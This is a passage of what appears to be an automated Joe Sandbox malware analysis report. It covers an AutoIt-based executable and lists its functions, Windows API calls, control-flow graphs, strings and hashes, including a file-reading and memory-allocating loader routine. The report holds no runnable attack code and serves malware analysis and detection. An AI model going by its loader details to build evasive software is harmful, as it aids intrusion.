                                            • _wcscat.LIBCMT ref: 0084C0E4
                                            • _wcscat.LIBCMT ref: 0084C0F7
                                            • _wcscmp.LIBCMT ref: 0084C03E
                                              • Part of subcall function 0084C56D: _wcscmp.LIBCMT ref: 0084C65D
                                              • Part of subcall function 0084C56D: _wcscmp.LIBCMT ref: 0084C670
                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0084C2A1
                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0084C338
                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0084C34E
                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0084C35F
                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0084C371
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                            • String ID: p1Wu`KXu
                                            • API String ID: 2378138488-4063981602
                                            • Opcode ID: 2458dcdc530cf3a9399330dabda6dc847684b64da02bc29f88c50ca81571766b
                                            • Instruction ID: 10014718b81a89c367548b967214e39e87f5216c21730ef497b0d8b398ef50ac
                                            • Opcode Fuzzy Hash: 2458dcdc530cf3a9399330dabda6dc847684b64da02bc29f88c50ca81571766b
                                            • Instruction Fuzzy Hash: A4C11BB1E0122DABDF51DF99CC81EDEB7BDFF49300F0040A6A609E6251DB709A848F65
                                            Function 00803F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • GetSysColorBrush.USER32(0000000F), ref: 00803F86
                                            • RegisterClassExW.USER32(00000030), ref: 00803FB0
                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00803FC1
                                            • InitCommonControlsEx.COMCTL32(?), ref: 00803FDE
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00803FEE
                                            • LoadIconW.USER32(000000A9), ref: 00804004
                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00804013
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                            • API String ID: 2914291525-1005189915
                                            • Opcode ID: a0caf384c1f97307137f4387aba4d7e31cf1425107183a50844bccc329fe92f9
                                            • Instruction ID: 58eea2f6caaaddf68a88bff9dd5a16f775cd063a61a7e51ba8a8d4b6d45e505c
                                            • Opcode Fuzzy Hash: a0caf384c1f97307137f4387aba4d7e31cf1425107183a50844bccc329fe92f9
                                            • Instruction Fuzzy Hash: 2921C4B5900318AFDF00EFA8E889FCDBBB4FB19710F00421AF611A62A0D7B44544CF91
                                            Function 00803742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 962 803742-803762 964 8037c2-8037c4 962->964 965 803764-803767 962->965 964->965 966 8037c6 964->966 967 8037c8 965->967 968 803769-803770 965->968 969 8037ab-8037b3 DefWindowProcW 966->969 970 871e00-871e2e call 802ff6 call 81e312 967->970 971 8037ce-8037d1 967->971 972 803776-80377b 968->972 973 80382c-803834 PostQuitMessage 968->973 975 8037b9-8037bf 969->975 1005 871e33-871e3a 970->1005 976 8037d3-8037d4 971->976 977 8037f6-80381d SetTimer RegisterWindowMessageW 971->977 979 803781-803783 972->979 980 871e88-871e9c call 844ddd 972->980 974 8037f2-8037f4 973->974 974->975 985 871da3-871da6 976->985 986 8037da-8037ed KillTimer call 803847 call 80390f 976->986 977->974 981 80381f-80382a CreatePopupMenu 977->981 982 803836-803840 call 81eb83 979->982 983 803789-80378e 979->983 980->974 999 871ea2 980->999 981->974 1000 803845 982->1000 989 803794-803799 983->989 990 871e6d-871e74 983->990 993 871ddc-871dfb MoveWindow 985->993 994 871da8-871daa 985->994 986->974 997 871e58-871e68 call 8455bd 989->997 998 80379f-8037a5 989->998 990->969 1004 871e7a-871e83 call 83a5f3 990->1004 993->974 1001 871dac-871daf 994->1001 1002 871dcb-871dd7 SetFocus 994->1002 997->974 998->969 998->1005 999->969 1000->974 1001->998 1006 871db5-871dc6 call 802ff6 1001->1006 1002->974 1004->969 1005->969 1010 871e40-871e53 call 803847 call 804ffc 1005->1010 1006->974 1010->969
                                            APIs
                                            • DefWindowProcW.USER32(?,?,?,?), ref: 008037B3
                                            • KillTimer.USER32(?,00000001), ref: 008037DD
                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00803800
                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0080380B
                                            • CreatePopupMenu.USER32 ref: 0080381F
                                            • PostQuitMessage.USER32(00000000), ref: 0080382E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                            • String ID: TaskbarCreated
                                            • API String ID: 129472671-2362178303
                                            • Opcode ID: 6f96377cf9f93c426e01d7752cdf1764dff346dbbd30a5e8af450a84bac5926c
                                            • Instruction ID: eea21b72a858aba966b9718ab1d3735f59c1c6d620d1eba388751a51ea9902b8
                                            • Opcode Fuzzy Hash: 6f96377cf9f93c426e01d7752cdf1764dff346dbbd30a5e8af450a84bac5926c
                                            • Instruction Fuzzy Hash: C741E1F120464EABDF649B6CAC8EF7A366DFB41700F044539FA02D21D2DA70DE509762
                                            Function 00803E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • GetSysColorBrush.USER32(0000000F), ref: 00803E79
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00803E88
                                            • LoadIconW.USER32(00000063), ref: 00803E9E
                                            • LoadIconW.USER32(000000A4), ref: 00803EB0
                                            • LoadIconW.USER32(000000A2), ref: 00803EC2
                                              • Part of subcall function 00804024: LoadImageW.USER32(00800000,00000063,00000001,00000010,00000010,00000000), ref: 00804048
                                            • RegisterClassExW.USER32(?), ref: 00803F30
                                              • Part of subcall function 00803F53: GetSysColorBrush.USER32(0000000F), ref: 00803F86
                                              • Part of subcall function 00803F53: RegisterClassExW.USER32(00000030), ref: 00803FB0
                                              • Part of subcall function 00803F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00803FC1
                                              • Part of subcall function 00803F53: InitCommonControlsEx.COMCTL32(?), ref: 00803FDE
                                              • Part of subcall function 00803F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00803FEE
                                              • Part of subcall function 00803F53: LoadIconW.USER32(000000A9), ref: 00804004
                                              • Part of subcall function 00803F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00804013
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                            • String ID: #$0$AutoIt v3
                                            • API String ID: 423443420-4155596026
                                            • Opcode ID: 525606e33284b38369a2a29d55a235e6d5fb436675d7906f31484c98f58d8bf8
                                            • Instruction ID: bc1f34500a73841c1af77105024a5d6a28b230bd050853a3266c4f5d256d5ced
                                            • Opcode Fuzzy Hash: 525606e33284b38369a2a29d55a235e6d5fb436675d7906f31484c98f58d8bf8
                                            • Instruction Fuzzy Hash: E12139B0E00304AFDF40DFA9EC89E99BBF5FB49314F14522AE618E22A1D77586548F91
                                            Function 0082ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1026 82acb3-82ace0 call 826ac0 call 827cf4 call 826986 1033 82ace2-82acf8 call 82e880 1026->1033 1034 82acfd-82ad02 1026->1034 1040 82af52-82af57 call 826b05 1033->1040 1036 82ad08-82ad0f 1034->1036 1038 82ad42-82ad51 GetStartupInfoW 1036->1038 1039 82ad11-82ad40 1036->1039 1041 82ae80-82ae86 1038->1041 1042 82ad57-82ad5c 1038->1042 1039->1036 1043 82af44-82af50 call 82af58 1041->1043 1044 82ae8c-82ae9d 1041->1044 1042->1041 1046 82ad62-82ad79 1042->1046 1043->1040 1047 82aeb2-82aeb8 1044->1047 1048 82ae9f-82aea2 1044->1048 1051 82ad80-82ad83 1046->1051 1052 82ad7b-82ad7d 1046->1052 1054 82aeba-82aebd 1047->1054 1055 82aebf-82aec6 1047->1055 1048->1047 1053 82aea4-82aead 1048->1053 1057 82ad86-82ad8c 1051->1057 1052->1051 1060 82af3e-82af3f 1053->1060 1061 82aec9-82aed5 GetStdHandle 1054->1061 1055->1061 1058 82adae-82adb6 1057->1058 1059 82ad8e-82ad9f call 826986 1057->1059 1063 82adb9-82adbb 1058->1063 1070 82ae33-82ae3a 1059->1070 1071 82ada5-82adab 1059->1071 1060->1041 1064 82aed7-82aed9 1061->1064 1065 82af1c-82af32 1061->1065 1063->1041 1068 82adc1-82adc6 1063->1068 1064->1065 1069 82aedb-82aee4 GetFileType 1064->1069 1065->1060 1067 82af34-82af37 1065->1067 1067->1060 1072 82ae20-82ae31 1068->1072 1073 82adc8-82adcb 1068->1073 1069->1065 1074 82aee6-82aef0 1069->1074 1078 82ae40-82ae4e 1070->1078 1071->1058 1072->1063 1073->1072 1075 82adcd-82add1 1073->1075 1076 82aef2-82aef8 1074->1076 1077 82aefa-82aefd 1074->1077 1075->1072 1081 82add3-82add5 1075->1081 1082 82af05 1076->1082 1083 82af08-82af1a InitializeCriticalSectionAndSpinCount 1077->1083 1084 82aeff-82af03 1077->1084 1079 82ae50-82ae72 1078->1079 1080 82ae74-82ae7b 1078->1080 1079->1078 1080->1057 1085 82add7-82ade3 GetFileType 1081->1085 1086 82ade5-82ae1a InitializeCriticalSectionAndSpinCount 1081->1086 1082->1083 1083->1060 1084->1082 1085->1086 1087 82ae1d 1085->1087 1086->1087 1087->1072
                                            APIs
                                            • __lock.LIBCMT ref: 0082ACC1
                                              • Part of subcall function 00827CF4: __mtinitlocknum.LIBCMT ref: 00827D06
                                              • Part of subcall function 00827CF4: EnterCriticalSection.KERNEL32(00000000,?,00827ADD,0000000D), ref: 00827D1F
                                            • __calloc_crt.LIBCMT ref: 0082ACD2
                                              • Part of subcall function 00826986: __calloc_impl.LIBCMT ref: 00826995
                                              • Part of subcall function 00826986: Sleep.KERNEL32(00000000,000003BC,0081F507,?,0000000E), ref: 008269AC
                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 0082ACED
                                            • GetStartupInfoW.KERNEL32(?,008B6E28,00000064,00825E91,008B6C70,00000014), ref: 0082AD46
                                            • __calloc_crt.LIBCMT ref: 0082AD91
                                            • GetFileType.KERNEL32(00000001), ref: 0082ADD8
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0082AE11
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                            • String ID:
                                            • API String ID: 1426640281-0
                                            • Opcode ID: e8c70d03b2d31fec8920ba1090539b08f76b7b38ecf0a0b83c0ad2103b41ac8c
                                            • Instruction ID: 176e36efc338af870801803b60edbcf5e7b8092140972096578741263fc78165
                                            • Opcode Fuzzy Hash: e8c70d03b2d31fec8920ba1090539b08f76b7b38ecf0a0b83c0ad2103b41ac8c
                                            • Instruction Fuzzy Hash: 8781B1B19053658FDB18CF68E9805A9BBF0FF05324B24425DD4A6EB3D1D7349883CB56
                                            Function 011B3100 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1088 11b3100-11b31ae call 11b0b20 1091 11b31b5-11b31db call 11b4010 CreateFileW 1088->1091 1094 11b31dd 1091->1094 1095 11b31e2-11b31f2 1091->1095 1096 11b332d-11b3331 1094->1096 1102 11b31f9-11b3213 VirtualAlloc 1095->1102 1103 11b31f4 1095->1103 1097 11b3373-11b3376 1096->1097 1098 11b3333-11b3337 1096->1098 1104 11b3379-11b3380 1097->1104 1100 11b3339-11b333c 1098->1100 1101 11b3343-11b3347 1098->1101 1100->1101 1107 11b3349-11b3353 1101->1107 1108 11b3357-11b335b 1101->1108 1109 11b321a-11b3231 ReadFile 1102->1109 1110 11b3215 1102->1110 1103->1096 1105 11b3382-11b338d 1104->1105 1106 11b33d5-11b33ea 1104->1106 1111 11b338f 1105->1111 1112 11b3391-11b339d 1105->1112 1113 11b33fa-11b3402 1106->1113 1114 11b33ec-11b33f7 VirtualFree 1106->1114 1107->1108 1115 11b336b 1108->1115 1116 11b335d-11b3367 1108->1116 1117 11b3238-11b3278 VirtualAlloc 1109->1117 1118 11b3233 1109->1118 1110->1096 1111->1106 1121 11b339f-11b33af 1112->1121 1122 11b33b1-11b33bd 1112->1122 1114->1113 1115->1097 1116->1115 1119 11b327a 1117->1119 1120 11b327f-11b329a call 11b4260 1117->1120 1118->1096 1119->1096 1128 11b32a5-11b32af 1120->1128 1124 11b33d3 1121->1124 1125 11b33ca-11b33d0 1122->1125 1126 11b33bf-11b33c8 1122->1126 1124->1104 1125->1124 1126->1124 1129 11b32e2-11b32f6 call 11b4070 1128->1129 1130 11b32b1-11b32e0 call 11b4260 1128->1130 1136 11b32fa-11b32fe 1129->1136 1137 11b32f8 1129->1137 1130->1128 1138 11b330a-11b330e 1136->1138 1139 11b3300-11b3304 CloseHandle 1136->1139 1137->1096 1140 11b331e-11b3327 1138->1140 1141 11b3310-11b331b VirtualFree 1138->1141 1139->1138 1140->1091 1140->1096 1141->1140
                                            APIs
                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 011B31D1
                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 011B33F7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1483155707.00000000011B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_11b0000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CreateFileFreeVirtual
                                            • String ID:
                                            • API String ID: 204039940-0
                                            • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                            • Instruction ID: a7ddfd5aa6934e2759f8af2b99d004e5ba1b61fb7b6bd2eb23c571c8d9bdd712
                                            • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                            • Instruction Fuzzy Hash: 78A12870E15209EBDB18CFA4C894BEEBBB5FF48304F208159E211BB291CB759A54CF55
                                            Function 008049FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1197 8049fb-804a25 call 80bcce RegOpenKeyExW 1200 8741cc-8741e3 RegQueryValueExW 1197->1200 1201 804a2b-804a2f 1197->1201 1202 874246-87424f RegCloseKey 1200->1202 1203 8741e5-874222 call 81f4ea call 8047b7 RegQueryValueExW 1200->1203 1208 874224-87423b call 806a63 1203->1208 1209 87423d-874245 call 8047e2 1203->1209 1208->1209 1209->1202
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00804A1D
                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008741DB
                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0087421A
                                            • RegCloseKey.ADVAPI32(?), ref: 00874249
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: QueryValue$CloseOpen
                                            • String ID: Include$Software\AutoIt v3\AutoIt
                                            • API String ID: 1586453840-614718249
                                            • Opcode ID: e5cc91841bbb29802ce983d6287ae853735b07e66191d92c860115d550eb708a
                                            • Instruction ID: d462da95d565e274b742a42d10f4925cdf909b84595f87fc13ecfef5586d1d1c
                                            • Opcode Fuzzy Hash: e5cc91841bbb29802ce983d6287ae853735b07e66191d92c860115d550eb708a
                                            • Instruction Fuzzy Hash: A5116DB1600209BEEB04ABA8CD86DBF7BACFF04344F005054B506D6191EB709E41DB54
                                            Function 008036B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1224 8036b8-803728 CreateWindowExW * 2 ShowWindow * 2
                                            APIs
                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008036E6
                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00803707
                                            • ShowWindow.USER32(00000000,?,?,?,?,00803AA3,?), ref: 0080371B
                                            • ShowWindow.USER32(00000000,?,?,?,?,00803AA3,?), ref: 00803724
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$CreateShow
                                            • String ID: AutoIt v3$edit
                                            • API String ID: 1584632944-3779509399
                                            • Opcode ID: 146569d736dab235cadc25d1f9179ce7e0bd7295d8e514dcb1d832771fe5f6b9
                                            • Instruction ID: f4abfdb152fcfc292a617cb99444d90f05cbbe2a9574a43e2814fcc25ad1ba1e
                                            • Opcode Fuzzy Hash: 146569d736dab235cadc25d1f9179ce7e0bd7295d8e514dcb1d832771fe5f6b9
                                            • Instruction Fuzzy Hash: 98F0DA716406D07AEB316767AC8CE672EBDFBC7F20F00001ABA04A21A1C57508A5DAB0
                                            Function 011B2ED0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1329 11b2ed0-11b2ffc call 11b0b20 call 11b2dc0 CreateFileW 1336 11b2ffe 1329->1336 1337 11b3003-11b3013 1329->1337 1338 11b30b3-11b30b8 1336->1338 1340 11b301a-11b3034 VirtualAlloc 1337->1340 1341 11b3015 1337->1341 1342 11b3038-11b304f ReadFile 1340->1342 1343 11b3036 1340->1343 1341->1338 1344 11b3053-11b308d call 11b2e00 call 11b1dc0 1342->1344 1345 11b3051 1342->1345 1343->1338 1350 11b30a9-11b30b1 ExitProcess 1344->1350 1351 11b308f-11b30a4 call 11b2e50 1344->1351 1345->1338 1350->1338 1351->1350
                                            APIs
                                              • Part of subcall function 011B2DC0: Sleep.KERNELBASE(000001F4), ref: 011B2DD1
                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 011B2FF2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1483155707.00000000011B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_11b0000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CreateFileSleep
                                            • String ID: R46IXDPE0DC3RD
                                            • API String ID: 2694422964-320771854
                                            • Opcode ID: 188fa75b469ef0f7ea6aca161075fdb85471ef6e0922e4a59cf8c263b14df007
                                            • Instruction ID: a7f9244f76bec0b1e7ea20ccc8820c9de9a13d9c552c1ea5c7c025917dd81bd0
                                            • Opcode Fuzzy Hash: 188fa75b469ef0f7ea6aca161075fdb85471ef6e0922e4a59cf8c263b14df007
                                            • Instruction Fuzzy Hash: 06519030D14249EBEF15DBA4D854BEFBB79AF08300F004599E619BB2C0D7791B49CBA6
                                            Function 008051AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 0080522F
                                            • _wcscpy.LIBCMT ref: 00805283
                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00805293
                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00873CB0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                            • String ID: Line:
                                            • API String ID: 1053898822-1585850449
                                            • Opcode ID: 3b601685694298f6950fb38167535b768570fce8a401eee61bdfd7279af0148a
                                            • Instruction ID: 86460ec410a918c34526aa754f8c1b609cf8a7ce27c522a45ca9b088600a23fa
                                            • Opcode Fuzzy Hash: 3b601685694298f6950fb38167535b768570fce8a401eee61bdfd7279af0148a
                                            • Instruction Fuzzy Hash: EB31CE71008740AED760EB64EC86FDB77E8FF45310F00451AF599D21D2EB74A6588BA7
                                            Function 00804139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 008041A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008039FE,?,00000001), ref: 008041DB
                                            • _free.LIBCMT ref: 008736B7
                                            • _free.LIBCMT ref: 008736FE
                                              • Part of subcall function 0080C833: __wsplitpath.LIBCMT ref: 0080C93E
                                              • Part of subcall function 0080C833: _wcscpy.LIBCMT ref: 0080C953
                                              • Part of subcall function 0080C833: _wcscat.LIBCMT ref: 0080C968
                                              • Part of subcall function 0080C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0080C978
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                            • API String ID: 805182592-1757145024
                                            • Opcode ID: 0e557d7bc983a1c3235bcde6a68e847f211537f725a536f4737657654b35100f
                                            • Instruction ID: e58097c17bbfea3b4692f5c9376231f45ad660d4ea04df35d1d0a075190684aa
                                            • Opcode Fuzzy Hash: 0e557d7bc983a1c3235bcde6a68e847f211537f725a536f4737657654b35100f
